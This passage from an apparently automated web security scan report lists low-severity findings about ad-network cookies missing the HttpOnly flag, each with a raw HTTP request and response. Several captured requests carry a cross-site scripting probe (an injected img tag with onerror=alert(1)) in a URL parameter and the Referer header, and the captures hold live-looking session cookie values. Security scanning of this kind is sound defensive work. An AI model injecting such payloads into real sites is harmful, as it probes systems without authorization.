User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Content-Length: 242
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 17 Sep 2011 16:43:51 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/verify/cookie
...[SNIP]...
13.170. http://tag.admeld.com/nai-test-opt-out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /nai-test-opt-out

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai-test-opt-out HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: D41U=3O_LLE8-29DICImy9URHxcH9B6xRZqc42EETd2Ub_PUcwXum8NjMz_w; admeld_opt_out=true

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 17 Sep 2011 17:14:35 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/optout/opt_su
...[SNIP]...
13.171. http://tag.admeld.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?admeld_adprovider_id=8&_segment=2%7CZZVrXBMk1mFi%7CFACO1.15576%7CTMII1.15432%7CMCRI1.15336%7CNETM7.15072 HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bh.contextweb.com/bh/drts?Rand=xsevrJj9ycVV
Cookie: meld_sess=642fefe9-2805-4880-8962-4149d004733c; D41U=3O_LLE8-29DICImy9URHxcH9B6xRZqc42EETd2Ub_PUcwXum8NjMz_w

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 35
Content-Type: image/gif
Date: Sat, 17 Sep 2011 17:04:35 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

GIF89a.......,.................D..;
13.172. http://tag.contextweb.com/TagPublish/GetAd.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=530930&ct=90495&cn=1&epid=&esid=&cf=728X90&rq=1&dw=1106&cwu=http%3A%2F%2Fwww.gather.com%2F426d8%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253E31b7c6065d67ada9d%3FrecentId%3D1688849889241963%26qualityCommentWidth%3D350%26url%3Dhttp%253A%252F%252Fwww.gather.com%252F%26_%3D&cwr=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mrnd=41857482&if=0&tl=1&pxy=189,100&cxy=1106,267&dxy=1106,267&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02%2F2011%3BMCRI1%0A749%3B09%2F17%2F2011%3BDOTM5%0A1443%3B09%2F21%2F2011%3BNETM7%0A3283%3B10%2F06%2F2011%3BTMII1%0A996%3B10%2F12%2F2011%3BFACO1; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|531292.BO-00000000521444319.0|534889.y9dly9jlztlwn.0|538303.x.0|535461.9033442320916087634.0"; C2W4=3ZWkodKrBuUFHIpAOk9fo5hjK_amQu3P6HhM4sg24rYSrdGNgVCZJAg; cw=cw

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP210
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 2177
Date: Sat, 17 Sep 2011 17:04:13 GMT
Connection: close
Set-Cookie: 530930_4_90495_1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 530930_4_90495_1=1316279053114; Domain=.contextweb.com; Path=/
Set-Cookie: vf=3; Domain=.contextweb.com; Expires=Sun, 18-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3CIFRAME%20HEIGHT%3D%2290%22%20WIDTH%3D%22728%22%20SRC%3D%22http%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2FBackupTags%2F530930%2F82ee614d-b189-4b28-8d83-df850b76e9
...[SNIP]...
13.173. http://tag.contextweb.com/TagPublish/getjs.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TagPublish/getjs.aspx?01AD=3ZWkodKrBuUFHIpAOk9fo5hjK_amQu3P6HhM4sg24rYSrdGNgVCZJAg&01RI=2245F2474819322&01NA=&action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=530930&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=90495 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02%2F2011%3BMCRI1%0A749%3B09%2F17%2F2011%3BDOTM5%0A1443%3B09%2F21%2F2011%3BNETM7%0A3283%3B10%2F06%2F2011%3BTMII1%0A996%3B10%2F12%2F2011%3BFACO1; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|531292.BO-00000000521444319.0|534889.y9dly9jlztlwn.0|538303.x.0|535461.9033442320916087634.0"; C2W4=CT-1

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP207
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Tue, 30 Aug 02011 12:12:33 EDT
Content-Type: application/x-javascript;charset=utf-8
Date: Sat, 17 Sep 2011 17:04:08 GMT
Content-Length: 8825
Connection: close
Set-Cookie: C2W4=3ZWkodKrBuUFHIpAOk9fo5hjK_amQu3P6HhM4sg24rYSrdGNgVCZJAg; expires=Sat, 15-Oct-2011 17:04:08 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 19:50:48 GMT; Path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="530930";var cwtagid="90495";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var c
...[SNIP]...
13.174. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.15086604817770422/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.15086604817770422/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.15086604817770422/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@11@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:13:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@12@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
13.175. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.1942676946055144/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.1942676946055144/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.1942676946055144/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@3@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:35:12 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@4@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
13.176. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.1974340253509581/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.1974340253509581/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.1974340253509581/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@2@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:35:08 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@3@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
13.177. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.2005994024220854/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.2005994024220854/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.2005994024220854/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@7@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:47:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@8@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
13.178. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.31795264524407685/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.31795264524407685/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.31795264524407685/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB26_27703FDE_10878AA%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=802568.8005145639%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@4@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:35:27 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@5@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
13.179. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.4155047545209527/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.4155047545209527/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.4155047545209527/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB26_27704D7D_10F5909%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=284706.307342276%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@5@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:41:22 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@6@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
13.180. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.5863753461744636/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.5863753461744636/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.5863753461744636/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@12@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:19:09 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234.3509589@13@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0
13.181. http://tr.adinterax.com/re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.7161733908578753/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/centro%2CHVCBSEATTLE001_SeattlePI_9_16_11%2CC%3DHVCBSEATTLE001%2CP%3DSeattleP-I%2CA%3DSBB%2CL%3DZ_SBB_2011%2CK%3D3509589/0.7161733908578753/0/in%2Cti/ti.gif
